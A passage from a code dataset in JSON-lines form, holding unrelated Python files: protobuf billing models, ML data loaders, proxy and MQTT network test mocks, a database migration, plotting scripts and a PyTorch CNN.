enum=CreditTypesTreatment,\n )\n services: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=3,\n )\n subaccounts: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=5,\n )\n labels: MutableMapping[str, struct_pb2.ListValue] = proto.MapField(\n proto.STRING,\n proto.MESSAGE,\n number=6,\n message=struct_pb2.ListValue,\n )\n calendar_period: \"CalendarPeriod\" = proto.Field(\n proto.ENUM,\n number=8,\n oneof=\"usage_period\",\n enum=\"CalendarPeriod\",\n )\n custom_period: \"CustomPeriod\" = proto.Field(\n proto.MESSAGE,\n number=9,\n oneof=\"usage_period\",\n message=\"CustomPeriod\",\n )\n\n\nclass CustomPeriod(proto.Message):\n r\"\"\"All date times begin at 12 AM US and Canadian Pacific Time\n (UTC-8).\n\n Attributes:\n start_date (google.type.date_pb2.Date):\n Required. The start date must be after\n January 1, 2017.\n end_date (google.type.date_pb2.Date):\n Optional. The end date of the time period. Budgets with\n elapsed end date won't be processed. 
If unset, specifies to\n track all usage incurred since the start_date.\n \"\"\"\n\n start_date: date_pb2.Date = proto.Field(\n proto.MESSAGE,\n number=1,\n message=date_pb2.Date,\n )\n end_date: date_pb2.Date = proto.Field(\n proto.MESSAGE,\n number=2,\n message=date_pb2.Date,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"packages/google-cloud-billing-budgets/google/cloud/billing/budgets_v1beta1/types/budget_model.py","file_name":"budget_model.py","file_ext":"py","file_size_in_byte":21649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327300230","text":"\"\"\"\n\n@Author:jyang\n@Date:5/24/2019\n\"\"\"\nfrom docx import Document\nfrom docx.oxml.ns import qn\n\nfile = Document()\nfile.styles['Normal'].font.name=u'微软雅黑'\nfile.styles['Normal']._element.rPr.rFonts.set(qn('w:eastAsia'), u'微软雅黑')\n\ntransfer_file = '../../Day011/code/CNDaily_20190529.txt'\nwith open(transfer_file, 'r', encoding='utf-8') as f:\n file.add_paragraph(f.read().strip())\n\nfile.save(transfer_file[:transfer_file.rindex('.')+1] + 'docx')","sub_path":"Day01-15/Day015/code/word_write.py","file_name":"word_write.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504975302","text":"import tensorflow as tf\nimport tensorflow_datasets as tfds\n\n\ndef cifar(train_batch_size=128,\n valid_batch_size=512,\n padding='reflect',\n dtype=tf.float32,\n shuffle_train=20000,\n repeat_train=True,\n version=10,\n data_dir=None):\n subtract = tf.constant([0.49139968, 0.48215841, 0.44653091], dtype=dtype)\n divide = tf.constant([0.24703223, 0.24348513, 0.26158784], dtype=dtype)\n\n def train_prep(x, y):\n x = tf.cast(x, dtype) / 255.0\n x = tf.image.random_flip_left_right(x)\n x = tf.pad(x, [[4, 4], [4, 4], [0, 0]], mode=padding)\n x = tf.image.random_crop(x, (32, 32, 3))\n x = (x - subtract) / divide\n return x, y\n\n def valid_prep(x, y):\n x = tf.cast(x, dtype) / 255.0\n x = (x - subtract) / divide\n return x, y\n\n if version == 10 or version == 100:\n ds = tfds.load(name=f'cifar{version}', as_supervised=True, data_dir=data_dir)\n else:\n raise Exception(f\"version = {version}, but should be either 10 or 100!\")\n\n if repeat_train:\n ds['train'] = ds['train'].repeat()\n if shuffle_train:\n ds['train'] = ds['train'].shuffle(shuffle_train)\n ds['train'] = ds['train'].map(train_prep)\n ds['train'] = ds['train'].batch(train_batch_size)\n # ds['train'] = ds['train'].prefetch(tf.data.experimental.AUTOTUNE)\n\n ds['test'] = ds['test'].map(valid_prep)\n ds['test'] = ds['test'].batch(valid_batch_size)\n return ds\n\n\ndef mnist(train_batch_size=100,\n valid_batch_size=400,\n dtype=tf.float32,\n shuffle_train=10000,\n data_dir=None):\n def preprocess(x, y):\n x = tf.cast(x, dtype)\n x /= 255\n return x, y\n\n ds = tfds.load(name='mnist', as_supervised=True, data_dir=data_dir)\n ds['train'] = ds['train'].repeat()\n ds['train'] = ds['train'].shuffle(shuffle_train)\n ds['train'] = ds['train'].map(preprocess)\n ds['train'] = ds['train'].batch(train_batch_size)\n\n ds['test'] = ds['test'].map(preprocess)\n ds['test'] = ds['test'].batch(valid_batch_size)\n\n ds['input_shape'] = (28, 28, 1)\n ds['n_classes'] = 10\n return ds\n\n\ndef test(train_batch_size=100,\n image_shape=(32, 32, 3),\n dtype=tf.float32):\n images = tf.ones([2, *image_shape])\n target = tf.constant([0, 1])\n\n def preprocess(x, y):\n x = tf.cast(x, dtype)\n return x, y\n\n ds = dict()\n ds['train'] = 
tf.data.Dataset.from_tensor_slices((images, target))\n ds['train'] = ds['train'].map(preprocess).repeat().batch(train_batch_size)\n ds['test'] = tf.data.Dataset.from_tensor_slices((images, target))\n ds['test'] = ds['test'].map(preprocess).batch(2)\n return ds\n\n\ndef get_dataset_from_alias(alias, precision=32):\n assert isinstance(alias, str)\n\n if precision == 16:\n dtype = tf.float16\n elif precision == 32:\n dtype = tf.float32\n elif precision == 64:\n dtype = tf.float64\n else:\n raise NotImplementedError(f\"Unknown precision {precision}!\")\n\n if alias == 'cifar10':\n return cifar(dtype=dtype, version=10)\n elif alias == 'cifar100':\n return cifar(dtype=dtype, version=100)\n elif alias == 'mnist':\n return mnist(dtype=dtype)\n else:\n raise NotImplementedError(f\"Unknown alias {alias}\")\n\n\ndef figure_out_input_shape(ds):\n for x, y in ds['test']:\n break\n else:\n raise RuntimeError(\"Dataset is empty!\")\n return x.shape[1:]\n\n\ndef figure_out_n_classes(ds):\n classes = set()\n for x, y in ds['test']:\n classes.update(y.numpy())\n return len(classes)\n","sub_path":"modules/tf_helper/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"532792780","text":"\n\nfrom xai.brain.wordbase.nouns._hodgepodge import _HODGEPODGE\n\n# class header\nclass _HODGEPODGES(_HODGEPODGE, ):\n\tdef __init__(self,): \n\t\t_HODGEPODGE.__init__(self)\n\t\tself.name = \"HODGEPODGES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"hodgepodge\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_hodgepodges.py","file_name":"_hodgepodges.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"251328660","text":"from .group import Office\n\nu = Office()\n\nMENU_OPTIONS = [\n ('Add a device', u.add_device),\n ('Add a smartphone', u.add_smartphone),\n ('Edit device data', u.edit_list),\n ('Print the device list', u.print_list),\n ('Save to file', u.save_to_file),\n ('Load from file', u.load_from_file),\n ('Delete a device', u.delete_from_list),\n ('Clear all', u.clear)\n]\n\n\ndef main():\n\n while True:\n \n print('------------------------------')\n \n for i, item in enumerate(MENU_OPTIONS, start = 1):\n print('{0}: {1}'.format(i, item[0]))\n print('0: Exit')\n\n print('------------------------------')\n\n\n try:\n choice = int(input('>> '))\n\n if choice == 0:\n break\n\n MENU_OPTIONS[choice - 1][1]()\n \n except Exception as ex:\n print(ex)\n print('Error!')","sub_path":"st02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
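# --- Added illustration (not part of the original st02/main.py record) ---
# The menu above is a dispatch table: (label, callable) pairs, looked up and
# invoked via `MENU_OPTIONS[choice - 1][1]()`. The same pattern in miniature,
# with hypothetical handlers:
def add_item():
    print('added')

def list_items():
    print('listed')

OPTIONS = [('Add item', add_item), ('List items', list_items)]
for i, (label, _) in enumerate(OPTIONS, start=1):
    print('{0}: {1}'.format(i, label))
OPTIONS[0][1]()  # dispatches to add_item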
+{"seq_id":"228472697","text":"from pypif.pif import loads, dumps\nfrom pypif.obj.system import System\nfrom pypif.obj.common.property import Property\n\n\ndef test_basic_round_robin():\n pif = System()\n pif.uid = \"foo\"\n pif2 = loads(dumps(pif))\n assert pif2.uid == pif.uid\n\n\ndef test_full_round_robin():\n pif = System()\n pif.properties = [Property(name=\"foo\", scalars=[2.4, 2.5]), Property(name=\"bar\", scalars=2.4)]\n pif2 = loads(dumps(pif))\n assert pif.properties[0].scalars[0].value == pif2.properties[0].scalars[0].value\n","sub_path":"pypif/tests/test_pif.py","file_name":"test_pif.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"120406592","text":"import numpy as np\nimport os\nimport os.path as op\nfrom scipy.io import loadmat\n\nrois = ['V1', 'V2', 'V3', 'hV4', 'IOG', 'pFus', 'mFus']\n\ndef filter_voxels(res, cutoff=50):\n # as in Kay et al., select non-noisy voxels with at least 50% variance explained\n idx = res['aggregatedtestperformance'][0] >= cutoff\n return np.median(res['params'][..., idx], axis=0)\n\nHERE = op.dirname(op.abspath(__file__))\nOUTDIR = op.join(op.dirname(HERE), 'output')\n\nparams = dict()\nfor hemi in ['L', 'R']:\n for roi in rois:\n ok_voxs = []\n for s in range(1, 4):\n res = loadmat(op.join(OUTDIR, f'sub-{s:02d}_{hemi}{roi}.mat'))\n ok_voxs.append(filter_voxels(res))\n ok_voxs = np.hstack(ok_voxs)\n params[f'{hemi}{roi}'] = ok_voxs\n\n# save parameters for later use\nheader = ['row', 'col', 'std', 'gain', 'n']\n\nfor roi, param in params.items():\n fnout = op.join(OUTDIR, f'{roi}_median_param.txt')\n if not op.exists(fnout):\n np.savetxt(fnout, param, header=' '.join(header))\n else:\n print(f'Skipping {fnout}, file exists')\n\n","sub_path":"vtcdata/code/make_parameter_files.py","file_name":"make_parameter_files.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
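# --- Added illustration (not part of the original make_parameter_files.py record) ---
# The selection in `filter_voxels` above is a boolean mask over the trailing
# (voxel) axis followed by a median over the leading axis. With hypothetical
# shapes (n_fits, n_params, n_voxels):
import numpy as np

params = np.random.rand(10, 5, 100)
performance = np.random.rand(100) * 100            # % variance explained per voxel
idx = performance >= 50                            # keep non-noisy voxels only
print(np.median(params[..., idx], axis=0).shape)   # -> (5, n_kept_voxels)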
+{"seq_id":"266675492","text":"\"\"\"\nCreate Figure 2 of Poleski and Yee (2019)\n\"Modeling microlensing events with MulensModel\"\nAstronomy and Computing 26, 35\nhttps://ui.adsabs.harvard.edu/abs/2019A&C....26...35P/abstract\nhttps://arxiv.org/abs/1803.01003\n\nExample magnification curves.\n\n\"\"\"\nfrom matplotlib import pyplot\nimport os\n\nfrom MulensModel import Model, SatelliteSkyCoord, MODULE_PATH\n\n\n# Define model parameters.\nparams = {'t_0': 2456900, 'u_0': 0.2, 't_E': 50.}\nparams_pi_E = {'pi_E_N': 0.35, 'pi_E_E': 0.5}\nparams_planet = {'rho': 0.002, 's': 1.5, 'q': 0.001, 'alpha': 348.1}\nra_dec = '18:00:00.00 -28:30:00.0'\n\n# Set models and satellite settings.\nmodel_pspl = Model(params)\nmodel_planet = Model({**params, **params_planet})\n\n# Calculate finite source magnification using VBBL method for this\n# range of dates:\nmodel_planet.set_magnification_methods([2456937, 'VBBL', 2456945])\n\n# Parallax settings:\nmodel_parallax = Model({**params, **params_pi_E}, coords=ra_dec)\nmodel_parallax.parallax(earth_orbital=True, satellite=True)\nsatellite = SatelliteSkyCoord(\n os.path.join(\n MODULE_PATH, 'data/ephemeris_files', 'Spitzer_ephemeris_01.dat'))\n# This file gives the Spitzer ephemeris and is part of the MulensModel package.\n\n# Plot the magnification curves.\nplot_kwargs = {'subtract_2450000': True, 'lw': 2.}\npyplot.figure(figsize=(8, 8))\npyplot.axes([0.1, 0.43, 0.85, 0.55])\nmodel_planet.plot_magnification(label='planetary', **plot_kwargs)\nmodel_parallax.plot_magnification(\n label='annual parallax', linestyle='-.', **plot_kwargs)\nmodel_pspl.plot_magnification(label='PSPL', linestyle='--', **plot_kwargs)\nmodel_parallax.plot_magnification(\n label='satellite parallax', satellite_skycoord=satellite, **plot_kwargs)\npyplot.legend(loc='best')\n\npyplot.axes([0.1, 0.07, 0.85, 0.25]) # Lower panel starts here.\nmodel_planet.plot_trajectory(caustics=True)\npyplot.xlim(-1.52, 1.61)\npyplot.xlabel(r\"$\\theta_x$\")\npyplot.ylabel(r\"$\\theta_y$\")\npyplot.savefig('figure_2.png')\n","sub_path":"examples/plots_2.py","file_name":"plots_2.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"150046748","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2019 BuildGroup Data Services Inc.\nimport logging\n\nfrom caravaggio_rest_api.tests import CaravaggioBaseTest\nfrom davinci_crawling.proxy.proxy_mesh import ProxyMesh\nfrom django.conf import settings\n\n_logger = logging.getLogger(\"davinci_crawling.testing\")\n\n\nclass TestProxyMesh(CaravaggioBaseTest):\n \"\"\"\n Test the proxy mesh logic. This test requires an internet connection\n because we use the proxy mesh API.\n \"\"\"\n\n all_files_count = 0\n\n @classmethod\n def setUpTestData(cls):\n pass\n\n def test_available_proxies(self):\n \"\"\"\n Test if we can get the available proxies from the proxy mesh API.\n \"\"\"\n proxy_mesh = ProxyMesh()\n proxies = proxy_mesh.get_to_use_proxies()\n self.assertTrue(len(proxies) > 0)\n\n def test_available_proxies_with_country_restrictions(self):\n \"\"\"\n Test if we can get the available proxies from the proxy mesh API,\n with country restrictions on the settings.\n \"\"\"\n proxy_mesh_settings = settings.DAVINCI_CONF[\"architecture-params\"][\"proxy\"][\"proxy_mesh\"]\n\n self._assert_proxies_are_from(proxy_mesh_settings, [\"fr\"])\n self._assert_proxies_are_from(proxy_mesh_settings, [\"us\"])\n self._assert_proxies_are_from(proxy_mesh_settings, [\"fr\", \"us\"])\n\n def _assert_proxies_are_from(self, proxy_mesh_settings, countries):\n countries_str = \",\".join(countries)\n\n proxy_mesh_settings[\"only-proxies-from\"] = countries_str\n ProxyMesh.to_use_proxies = None\n ProxyMesh.available_proxies = None\n proxy_mesh = ProxyMesh()\n proxies = proxy_mesh.get_to_use_proxies()\n for proxy in proxies:\n proxy_http = proxy[\"http\"]\n proxy_http = proxy_http.replace(\"http://\", \"\")\n proxy_country = proxy_http[0:2]\n\n for country in countries:\n if country == proxy_country:\n break\n else:\n self.fail(\"Returned an invalid country\")\n\n def test_get_proxy_address(self):\n \"\"\"\n Test getting a proxy address.\n \"\"\"\n all_proxies = ProxyMesh.get_available_proxies()\n\n received_proxies = set()\n for _ in range(50):\n proxy = ProxyMesh().get_proxy_address()\n received_proxies.add(proxy[\"http\"])\n\n # assert that we generated at least 50% of the possible values for\n # proxy\n self.assertTrue(len(received_proxies) > len(all_proxies) * 0.5)\n","sub_path":"src/davinci_crawling/proxy/tests/test_proxy_mesh.py","file_name":"test_proxy_mesh.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"94246010","text":"\"\"\"Add 'schedule_until' column to queries.\n\nRevision ID: eb2f788f997e\nRevises: d1eae8b9893e\nCreate Date: 2017-03-02 12:20:00.029066\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eb2f788f997e'\ndown_revision = 'd1eae8b9893e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n 'queries',\n sa.Column('schedule_until', sa.DateTime(timezone=True), nullable=True))\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('queries', 'schedule_until')\n","sub_path":"migrations/versions/eb2f788f997e_.py","file_name":"eb2f788f997e_.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
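# --- Added illustration (not part of the original test_proxy_mesh.py record) ---
# Standalone sketch of the statistical argument behind test_get_proxy_address
# above: 50 uniform draws from a small pool almost surely cover well over half
# of it, so the >50% assertion is a cheap smoke test that proxy selection is
# not stuck on a single address. (Pool and URLs are hypothetical.)
import random

pool = ['http://proxy-%d' % i for i in range(10)]
seen = {random.choice(pool) for _ in range(50)}
assert len(seen) > len(pool) * 0.5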
+{"seq_id":"423091325","text":"####################################\n# Imports\n####################################\nimport requests\nimport random\nimport uuid\nimport time\nimport sys\nimport json\nimport paho.mqtt.client as mqtt\nimport gevent\n\n#from .MqttClient import MqttClient\nfrom .MacAddress import MacAddress\n\nclass CoreNetworkSimple:\n def __init__(\n self,\n mac=None,\n gk_url=None, \n mqtt_on_connect=lambda *args: None,\n mqtt_on_disconnect=lambda *args: None\n ):\n if gk_url is None:\n raise Exception('full gk_url must be provided')\n \n self.mqtt_on_connect = mqtt_on_connect\n self.mqtt_on_disconnect = mqtt_on_disconnect\n self.macAddress = MacAddress(mac=mac if mac is not None else random.randint(0, 10000000000))\n self.location_id = \"location-id-%s\" % (uuid.uuid4())\n self.network = self._core_create_dummy_network_model()\n self.gk_url = gk_url\n\n @staticmethod\n def nothing():\n return True\n\n def populate_network(self, mqtt_status = True, mqtt_history = True, retry = 2):\n runtime_start = time.time()\n\n # Register\n results = self._gatekeeper_register_network(retry = retry)\n runtime_gatekeeper_registration = time.time()\n self.network_id = self.guardian_mqtt['network_id']\n self.guardian_type = self.guardian_mqtt[\"mqType\"]\n\n # Initialize history\n if mqtt_status or mqtt_history:\n self._mqtt_connect()\n \n # pass the current time explicitly so the report helpers never fall back to a stale default\n guardianReport = self._create_guardian_status_report(time.time())\n motionReport = self._create_motionmatrix_report(time.time())\n \n if mqtt_status:\n self._mqtt_publish(\"guardian-status\", guardianReport)\n if mqtt_history:\n self._mqtt_publish(\"motion-matrix\", motionReport)\n\n # Return stats\n runtime_end_mqtt = time.time()\n runtimes = {\n \"total\": runtime_end_mqtt - runtime_start,\n \"gatekeeper\": runtime_gatekeeper_registration - runtime_start,\n \"mqtt\": runtime_end_mqtt - runtime_gatekeeper_registration,\n }\n return {'results': results, 'runtimes': runtimes}\n \n def send_guardian_status_report(self, timestamp = None):\n # a `timestamp = time.time()` default would be evaluated once at import time,\n # so resolve the default per call instead\n if timestamp is None:\n timestamp = time.time()\n guardianReport = self._create_guardian_status_report(timestamp)\n self._mqtt_publish(\"guardian-status\", guardianReport)\n\n def send_heartbeat(self, timestamp = None):\n if timestamp is None:\n timestamp = time.time()\n guardianReport = self._create_guardian_status_report(timestamp, heartbeat = True)\n self._mqtt_publish(\"guardian-status\", guardianReport)\n\n def send_motion(self, timestamp = None):\n if timestamp is None:\n timestamp = time.time()\n motionReport = self._create_motionmatrix_report(timestamp = timestamp)\n self._mqtt_publish(\"motion-matrix\", motionReport)\n\n #--- Internal API past this point\n \n def __del__(self):\n if hasattr(self, \"mqtt_connection\"):\n self._mqtt_disconnect()\n\n @property\n def guardian_mqtt(self):\n return self.network['nodes'][0]['gk_reply']['local_config']['guardian_mqtt']\n \n def _mqtt_connect(self, username = 'device'):\n self.mqtt_connection = mqtt.Client(client_id=self.location_id)\n self.mqtt_connection.username_pw_set(username=username, password=self.guardian_mqtt['mqToken'])\n self.mqtt_connection.connect(self.guardian_mqtt['mqServer'], port=self.guardian_mqtt['mqPort'])\n self.mqtt_connection.on_connect = self.mqtt_on_connect\n self.mqtt_connection.on_disconnect = self.mqtt_on_disconnect\n self.glet = gevent.spawn(self.mqtt_connection.loop_forever)\n\n
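# --- Added illustration (not part of the original core_network_mock.py record) ---
# `_mqtt_publish` below polls MQTTMessageInfo.is_published() in a gevent sleep
# loop. paho-mqtt also ships a blocking helper, wait_for_publish(); a sketch
# (broker address and topic are hypothetical):
import paho.mqtt.client as mqtt

client = mqtt.Client(client_id='example-device')
client.connect('broker.example.com', port=1883)
client.loop_start()
info = client.publish('iot-2/type/t/id/d/evt/guardian-status/fmt/json', '{}', qos=1)
info.wait_for_publish()  # blocks until the QoS-1 handshake completes
client.loop_stop()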
 def _mqtt_publish(self, event, data):\n # Blocking call to send a report to an MQTT client\n topic = \"iot-2/type/%s/id/%s/evt/%s/fmt/json\" % (self.guardian_type, self.location_id, event)\n\n check = 0\n msg_info = self.mqtt_connection.publish(topic, json.dumps(data), qos=1)\n if not msg_info.is_published():\n while not msg_info.is_published():\n gevent.sleep(0.1)\n check += 1\n if check > 300:\n print(\"Failed to publish to MQTT\")\n return False\n\n def _mqtt_disconnect(self):\n print(\"MQTT disconnect in progress\", self.location_id)\n self.mqtt_connection.disconnect()\n gevent.joinall([self.glet])\n delattr(self, \"mqtt_connection\")\n\n def _core_create_dummy_network_model(self):\n mac_address = self.macAddress\n \n # Define a 3-node mesh network, where one acts as the gateway.\n network = {\n # External IP assigned to the master wan0 ethernet\n # interface.\n \"ip\": \"10.0.0.0\",\n # Gateway mac and IP address\n \"gateway\": {\"mac\": \"ff:00:00:00:00:00\", \"ip\": \"10.0.0.0\"},\n \"nodes\": [\n {\n # Master node\n \"role\": \"master\",\n \"mesh_mac\": mac_address.address(),\n \"eth_mac\": mac_address.offset(1),\n \"wlan_2ghz_mac\": mac_address.offset(2),\n \"wlan_5ghz_mac\": mac_address.offset(3),\n \"peers\": [1, 2, 3],\n },\n {\n # Peer node 1\n \"role\": \"peer\",\n \"mesh_mac\": mac_address.offset(\"10\"),\n \"eth_mac\": mac_address.offset(\"11\"),\n \"wlan_2ghz_mac\": mac_address.offset(\"12\"),\n \"wlan_5ghz_mac\": mac_address.offset(\"13\"),\n \"peers\": [0, 2, 4],\n },\n {\n # Peer node 2\n \"role\": \"peer\",\n \"mesh_mac\": mac_address.offset(\"20\"),\n \"eth_mac\": mac_address.offset(\"21\"),\n \"wlan_2ghz_mac\": mac_address.offset(\"22\"),\n \"wlan_5ghz_mac\": mac_address.offset(\"23\"),\n \"peers\": [0, 1, 5],\n },\n {\n # Leaf node 1 (connected to Master)\n \"role\": \"leaf\",\n \"mesh_mac\": mac_address.offset(\"30\"),\n \"peers\": [0],\n },\n {\n # Leaf node 2 (connected to Peer node 1)\n \"role\": \"leaf\",\n \"mesh_mac\": mac_address.offset(\"40\"),\n \"peers\": [1],\n },\n {\n # Leaf node 3 (connected to Peer node 2)\n \"role\": \"leaf\",\n \"mesh_mac\": mac_address.offset(\"50\"),\n \"peers\": [2],\n },\n ],\n }\n return network\n\n def _gatekeeper_register_network(self, retry = 2):\n # Register a new (or existing) network by publishing radar status\n # reports to gatekeeper.\n # print(\"Registering network with gatekeeper @ %s...\" % gatekeeper_url)\n results = []\n for node in self.network[\"nodes\"]:\n if node[\"role\"] not in [\"master\", \"peer\"]:\n continue\n\n status = self._create_radar_status_report(node)\n payload = {\n \"radar_status\": status,\n \"factory_reset\": False,\n \"master_failed\": False,\n \"location_id\": self.location_id,\n }\n \n while True:\n root = requests.post(self.gk_url, json=payload)\n if retry == 0:\n print(root.__dict__)\n raise Exception(\"Failed to register %s with gatekeeper, after 3 tries.\" % node)\n elif root.status_code == 200:\n node['gk_reply'] = root.json()\n results.append(root.status_code)\n break\n else:\n rand_number = random.randint(10, 30)\n print(\"Retrying in %i\" % rand_number)\n time.sleep(rand_number)\n retry -= 1\n \n return results\n\n
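# --- Added illustration (not part of the original core_network_mock.py record) ---
# The nested i/j loops in _create_motionmatrix_report below enumerate unordered
# node pairs; itertools.combinations expresses the same thing directly:
from itertools import combinations

def mac_to_linkstr(mac):
    return mac.replace(':', '')[-6:]

macs = ['ff:00:00:00:00:00', 'ff:00:00:00:00:10', 'ff:00:00:00:00:20']
links = [mac_to_linkstr(a) + '-' + mac_to_linkstr(b) for a, b in combinations(macs, 2)]
print(links)  # n*(n-1)/2 pairs -> 3 links for 3 nodes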
 def _create_motionmatrix_report(self, timestamp = None, interval = 500, count = 1, report_type=\"matrix\"):\n # Create a dummy motion matrix report\n # (default timestamp is resolved per call, not once at import time)\n if timestamp is None:\n timestamp = time.time()\n def mac_to_linkstr(mac):\n return mac.replace(\":\", \"\")[-6:]\n\n data_key = \"data\" if report_type == \"matrix\" else \"motion\"\n\n report = {\n \"ts\": timestamp,\n \"interval\": interval,\n \"count\": count,\n data_key: {\"mkai\": [], \"throughput\": []},\n \"links\": [],\n }\n\n # Generate link list combinations (using the mesh macs in the\n # network).\n for i in range(len(self.network[\"nodes\"]) - 1):\n for j in range(i + 1, len(self.network[\"nodes\"])):\n src_mac = self.network[\"nodes\"][i][\"mesh_mac\"]\n dest_mac = self.network[\"nodes\"][j][\"mesh_mac\"]\n report[\"links\"].append( mac_to_linkstr(src_mac) + \"-\" + mac_to_linkstr(dest_mac) )\n\n for l in range(len(report[\"links\"])):\n # Omit the outer arrays when count=1\n if count == 1:\n mkai = random.random()\n throughput = 1.0\n else:\n mkai = [random.random() for x in range(report[\"count\"])]\n throughput = [1.0]*report[\"count\"]\n report[data_key][\"mkai\"].append(mkai)\n report[data_key][\"throughput\"].append(throughput)\n \n return report\n\n\n\n\n def _create_guardian_status_report(self, timestamp = None, heartbeat = False):\n report = {\n \"ts\": timestamp if timestamp is not None else time.time(),\n \"guardian_id\": self.location_id,\n \"network_id\": self.network_id,\n \"last_motion\": time.time(),\n \"motion_enabled\": 1,\n \"motion_tripped\": 0\n }\n\n if not heartbeat:\n radar_reports = {}\n for node in self.network[\"nodes\"]:\n if node[\"role\"] not in [\"master\", \"peer\"]:\n continue\n radar_reports[\"test-\" + node[\"eth_mac\"].replace(\":\", \"\")] = self._create_radar_status_report(node)\n report[\"radars\"] = radar_reports\n\n return report\n\n def _create_radar_status_report(self, node, timestamp = None):\n # Create a dummy-status block for a given network node,\n # such that we can get a valid response from gatekeeper\n # with it.\n\n # Master node must be first one\n master_node = self.network[\"nodes\"][0]\n if timestamp is None:\n timestamp = time.time()\n\n # Create empty status report\n status = {\n \"location_id\": self.location_id,\n \"deviceId\": \"test-\" + node[\"eth_mac\"].replace(\":\", \"\"),\n \"ts\": timestamp,\n \"interfaces\": [],\n \"links\": [],\n \"ap_bssid_2ghz\": node[\"wlan_2ghz_mac\"],\n \"ap_bssid_5ghz\": node[\"wlan_5ghz_mac\"],\n \"mesh_bssid\": node[\"mesh_mac\"],\n \"gateway_bssid\": master_node[\"mesh_mac\"],\n \"root_mode\": 1,\n }\n\n # Override gateway bssid for master node:\n if node == master_node:\n status[\"gateway_bssid\"] = self.network[\"gateway\"][\"mac\"]\n status[\"root_mode\"] = 2\n\n # Add wan0 ethernet interface with default gateway,\n # but only set its type to ETHERNET if this is the master.\n if node == master_node:\n if_type = \"ETHERNET\"\n else:\n if_type = \"BRIDGE\"\n\n interface = {\n \"name\": \"wan0\",\n \"type\": if_type,\n \"mac\": node[\"eth_mac\"],\n \"ip\": \"10.22.22.1\",\n \"routes\": [{\"dst\": \"0.0.0.0\"}],\n }\n status[\"interfaces\"].append(interface)\n\n # Populate link list for all local peers\n # This is what is actually used to form the network.\n for peer_id in node[\"peers\"]:\n peer_node = self.network[\"nodes\"][peer_id]\n\n link_entry = {\"mac\": peer_node[\"mesh_mac\"], \"peer_type\": \"7\"}\n\n if peer_node[\"role\"] == \"leaf\":\n link_entry[\"peer_type\"] = \"2\"\n\n status[\"links\"].append(link_entry)\n \n return status\n \n","sub_path":"workers/mns_py/src/common/core_network_mock.py","file_name":"core_network_mock.py","file_ext":"py","file_size_in_byte":12202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"167196415","text":"from fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport json\n\nwith open(\"imdb_output.json\", \"r\") as f:\n movies = json.load(f)\n\n
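# --- Added illustration (not part of the original updatebudgets.py record) ---
# fuzzywuzzy's process.extractOne returns a (best_match, score) tuple with a
# 0-100 score, which is why the record keeps a match only when match[1] > 90:
from fuzzywuzzy import process

titles = ['The Matrix', 'The Matrix Reloaded', 'Titanic']
print(process.extractOne('matrix', titles))  # e.g. ('The Matrix', 90)

with open(\"movie_budget.json\", \"r\") 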
as f:\n budgets = json.load(f)\n\ntitles = {}\ntitlesList = []\nfor id, movie in enumerate(budgets):\n\ttitles[movie['movie_name']]= id\n\ttitlesList.append(movie['movie_name'])\n\n\nnewMovies = []\nfor id, movie in enumerate(movies):\n\t#find the closest match\n\tmatch = process.extractOne(movie['movie_title'], titlesList)\n\tresult = match[0]\n\n\tif match[1] > 90:\n\t\t#get the proper budget data\n\t\tbudget_data = budgets[titles[result]]\n\t\tmovie['release_date'] = budget_data['release_date']\n\t\tmovie['worldwide_gross'] = budget_data['worldwide_gross']\n\t\tmovie['production_budget'] = budget_data['production_budget']\n\t\tnewMovies.append(movie)\n\nwith open('imdb_output_budget.json', 'w') as fp:\n json.dump(newMovies, fp)","sub_path":"updatebudgets.py","file_name":"updatebudgets.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5914202","text":"\nimport torch.nn as nn\nfrom torch.functional import F\nimport torch\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nclass CNN(nn.Module):\n def __init__(self, vocab_size, embedding_dim, n_filters, filter_sizes, output_dim, \n dropout, pad_idx):\n \n super().__init__()\n \n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n \n self.convs = nn.ModuleList([\n nn.Conv2d(in_channels = 1, \n out_channels = n_filters, \n kernel_size = (fs, embedding_dim)) \n for fs in filter_sizes\n ])\n \n self.fc = nn.Linear(len(filter_sizes) * n_filters, output_dim)\n \n self.dropout = nn.Dropout(dropout)\n \n def forward(self, text):\n \n #text = [sent len, batch size]\n \n text = 